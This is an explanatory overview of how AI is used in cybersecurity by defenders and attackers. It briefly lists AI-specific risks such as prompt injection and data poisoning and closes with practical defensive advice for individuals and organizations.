AI in Cybersecurity

AI in cybersecurity spans a broad spectrum of applications, from very real wins to very real concerns. The marketing of "AI-powered security" has run far ahead of the actual capabilities in many cases; in other cases, the substantive capability is more dramatic than the marketing.

Where AI actually wins for defenders

• Anomaly detection at scale. Modern EDR and SIEM tools use ML to detect deviations from baseline behavior across millions of events. Far better than rule-based detection for novel attacks.
• Phishing classification. ML models that look at headers, URLs, content, and sender behavior catch most commodity phishing automatically. The false-positive rate is what limits aggressive blocking.
• Malware classification. Static and dynamic analysis combined with ML classifies new files faster than signature-based AV could. Most modern EDRs use ML as part of their classification pipeline.
• Triage and prioritization. Security analysts drown in alerts; ML can rank them by likely severity, reducing investigation time per analyst.
• Vulnerability discovery. Fuzz testing guided by ML and code-property graph analysis finds bugs faster than traditional fuzzing. Google's OSS-Fuzz finds tens of thousands of bugs across open-source projects this way.
• LLM-assisted code review. Spotting common security antipatterns (SQL injection, XSS, hardcoded secrets) in pull requests. Modern code-review AIs catch a real fraction of these.

Where AI is overhyped for defenders

• "AI-driven threat intelligence." Often just keyword extraction from feeds. The hard part is action, not detection.
• Autonomous response. Few organizations let AI take meaningful destructive actions (blocking accounts, isolating hosts) without human approval. The risk of false positives is too high.
• AI-powered "next-gen" antivirus that promises to catch every attack. Adversaries adapt; no model catches everything. AV with ML is meaningfully better than without, but it's not a silver bullet.

Where AI actually helps attackers

• Spear phishing at scale. LLMs let attackers personalize phishing emails for thousands of targets at the quality previously possible only for one. This is the most-observed AI impact on the attacker side as of 2025–2026.
• Voice cloning. Modern voice models trained on a few seconds of audio produce convincing impersonation. The Arup deepfake CFO incident (2024) was AI voice + video. Vishing attacks have improved dramatically.
• Code generation for exploits. LLMs help less-skilled attackers generate workable malware, refactor existing exploits, and write polished social-engineering content.
• Vulnerability research. Same fuzz-and-ML techniques defenders use can be turned to finding bugs in proprietary software.
• Captcha and bot defense bypass. AI solvers defeat most visual captchas; commercial captcha-solving services are AI-based.

AI-specific attack surfaces

AI systems themselves have new vulnerability categories:

• Prompt injection. Untrusted input (from users, retrieved documents, web pages) overrides the system's instructions to an LLM, getting it to behave outside policy. Currently unsolved at the architecture level.
• Data poisoning. Adversaries contribute training data designed to introduce backdoors or weaken the model.
• Model extraction. Querying an API enough times to reconstruct the model's weights or training data.
• Adversarial examples. Inputs crafted to make the model misclassify — historically demonstrated on image classifiers, also against malware classifiers.
• Memorization. Models memorize training data; if training data included secrets (API keys committed to public GitHub) the model may leak them.

The big shifts as of 2026

• AI agents are becoming a real attack surface. Autonomous agents with tool access (browsers, shells, APIs) can be hijacked via prompt injection into doing the attacker's bidding.
• Defenders increasingly use LLMs in the SOC. For drafting incident reports, summarizing logs, suggesting next steps. Cuts response time meaningfully.
• The arms race is real. Both sides are deploying AI faster than legal and regulatory frameworks adapt. The next several years will be turbulent.

What this means for users

For individuals:

• Phishing is going to be better-written. Don't trust quality of prose as a signal anymore.
• Voice and video deepfakes are real. For high-stakes verification, use code phrases or callback to known numbers.
• Hardware-key 2FA defeats most AI-enhanced phishing because origin binding doesn't care about prose quality.
• The browser tooling and OS tooling protecting you also got better; the net effect for an ordinarily careful user is roughly neutral.

For organizations:

• Invest in EDR/XDR with strong ML components — the floor of defense has risen.
• Plan for AI-enhanced social engineering. Out-of-band verification protocols matter more than ever.
• If you deploy LLMs internally, treat them as untrusted code-execution surfaces. Prompt injection is real.
• Don't let "AI security" buzzwords drive procurement. Ask what the model does, how it's trained, how false positives are managed.